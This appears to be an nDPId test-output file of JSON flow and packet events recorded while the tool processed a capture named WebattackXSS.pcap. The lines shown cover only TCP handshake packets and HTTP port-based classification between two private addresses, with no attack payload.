+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":2,"flow_last_seen":1499347498249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347498249,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4ejKfeZhXxfDAKAScSD4AgAAAgQFtAQCCAoD5L+DATruDgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":3,"flow_last_seen":1499347498250,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347498250,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LPJAAD4GmOasEAABwKgKMuHoAFBfF8MAyn3mYoAQAOWXCgAAAQEICgE67g4D5L+D"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347499500,"flow_last_seen":1499347499500,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347499500,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57846,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":1,"flow_last_seen":1499347499500,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347499500,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82IhAAD4G7UesEAABwKgKMuH2AFAMLDfPAAAAAKACchBIQAAAAgQFtAQCCAoBOu9HAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4436,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":2,"flow_last_seen":1499347499500,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347499500,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4fa1N28pDCw30KAScSBgHQAAAgQFtAQCCAoD5MC8ATrvRwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4437,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":3,"flow_last_seen":1499347499501,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347499501,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02IlAAD4G7U6sEAABwKgKMuH2AFAMLDfQtTdvKoAQAOX\/JAAAAQEICgE670cD5MC8"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4450,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347500770,"flow_last_seen":1499347500770,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347500770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4450,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":1,"flow_last_seen":1499347500770,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347500770,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YZZAAD4GZDqsEAABwKgKMuIEAFAvvZESAAAAAKACchDKIAAAAgQFtAQCCAoBOvCEAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":2,"flow_last_seen":1499347500770,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347500770,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4gSIcKZ3L72RE6AScSDWOAAAAgQFtAQCCAoD5MH6ATrwhAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4452,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":3,"flow_last_seen":1499347500770,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347500770,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YZdAAD4GZEGsEAABwKgKMuIEAFAvvZETiHCmeIAQAOV1QAAAAQEICgE68IQD5MH6"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347503273,"flow_last_seen":1499347503273,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347503273,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":1,"flow_last_seen":1499347503273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347503273,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JtZAAD4GnvqsEAABwKgKMuIeAFAcz9QgAAAAAKACchCXdAAAAgQFtAQCCAoBOvL2AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":2,"flow_last_seen":1499347503273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347503273,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4h43pRReHM\/UIaAScSCEAAAAAgQFtAQCCAoD5MRrATry9gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4468,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":3,"flow_last_seen":1499347503274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347503274,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JtdAAD4GnwGsEAABwKgKMuIeAFAcz9QhN6UUX4AQAOUjCAAAAQEICgE68vYD5MRr"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347504529,"flow_last_seen":1499347504529,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347504529,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":1,"flow_last_seen":1499347504529,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347504529,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MbJAAD4GlB6sEAABwKgKMuIsAFBuJcWCAAAAAKACchBTdAAAAgQFtAQCCAoBOvQwAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":2,"flow_last_seen":1499347504529,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347504529,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4iwP0\/y\/biXFg6AScSB+NgAAAgQFtAQCCAoD5MWlATr0MAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4479,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":3,"flow_last_seen":1499347504530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347504530,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MbNAAD4GlCWsEAABwKgKMuIsAFBuJcWDD9P8wIAQAOUdPgAAAQEICgE69DAD5MWl"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4489,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347505774,"flow_last_seen":1499347505774,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505774,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57914,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4489,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":1499347505774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347505774,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8e\/VAAD4GSdusEAABwKgKMuI6AFCzho6SAAAAAKACchBDvgAAAgQFtAQCCAoBOvVnAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4490,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":2,"flow_last_seen":1499347505774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347505774,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4joOXGebs4aOk6AScSAD5AAAAgQFtAQCCAoD5MbdATr1ZwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4491,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":3,"flow_last_seen":1499347505775,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347505775,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0e\/ZAAD4GSeKsEAABwKgKMuI6AFCzho6TDlxnnIAQAOWi6wAAAQEICgE69WcD5Mbd"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347371602,"flow_last_seen":1499347376719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347371602,"flow_last_seen":1499347376719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347374136,"flow_last_seen":1499347379720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347374136,"flow_last_seen":1499347379720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347375388,"flow_last_seen":1499347380720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56522,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347375388,"flow_last_seen":1499347380720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347376638,"flow_last_seen":1499347381720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347376638,"flow_last_seen":1499347381720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347379171,"flow_last_seen":1499347384721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56562,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347379171,"flow_last_seen":1499347384721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56562,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347380424,"flow_last_seen":1499347385722,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56576,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347380424,"flow_last_seen":1499347385722,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4507,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347508344,"flow_last_seen":1499347508344,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347508344,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4507,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":1499347508344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347508344,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QeJAAD4Gg+6sEAABwKgKMuJUAFDv7LYIAAAAAKACchDdRAAAAgQFtAQCCAoBOvfqAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":2,"flow_last_seen":1499347508344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347508344,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4lSsQaQu7+y2CaAScSDAbwAAAgQFtAQCCAoD5MlfATr36gEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":3,"flow_last_seen":1499347508345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347508345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QeNAAD4Gg\/WsEAABwKgKMuJUAFDv7LYJrEGkL4AQAOVfdwAAAQEICgE69+oD5Mlf"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4519,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347509601,"flow_last_seen":1499347509601,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347509601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4519,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":1,"flow_last_seen":1499347509601,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347509601,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8U2ZAAD4GcmqsEAABwKgKMuJiAFBgjKpCAAAAAKACchB3IwAAAgQFtAQCCAoBOvkkAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4520,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":2,"flow_last_seen":1499347509601,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347509601,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4mJHoK+XYIyqQ6AScSCyTAAAAgQFtAQCCAoD5MqZATr5JAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":3,"flow_last_seen":1499347509602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347509602,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0U2dAAD4GcnGsEAABwKgKMuJiAFBgjKpDR6CvmIAQAOVRVAAAAQEICgE6+SQD5MqZ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4540,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347512081,"flow_last_seen":1499347512081,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347512081,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4540,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":1,"flow_last_seen":1499347512081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347512081,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87jVAAD4G15qsEAABwKgKMuJ8AFAKmxWlAAAAAKACchBfLAAAAgQFtAQCCAoBOvuQAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":2,"flow_last_seen":1499347512081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347512081,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4nwCiqB4CpsVpqAScSDsHgAAAgQFtAQCCAoD5M0FATr7kAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":3,"flow_last_seen":1499347512082,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347512082,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07jZAAD4G16GsEAABwKgKMuJ8AFAKmxWmAoqgeYAQAOWLJgAAAQEICgE6+5AD5M0F"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4549,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347513353,"flow_last_seen":1499347513353,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347513353,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 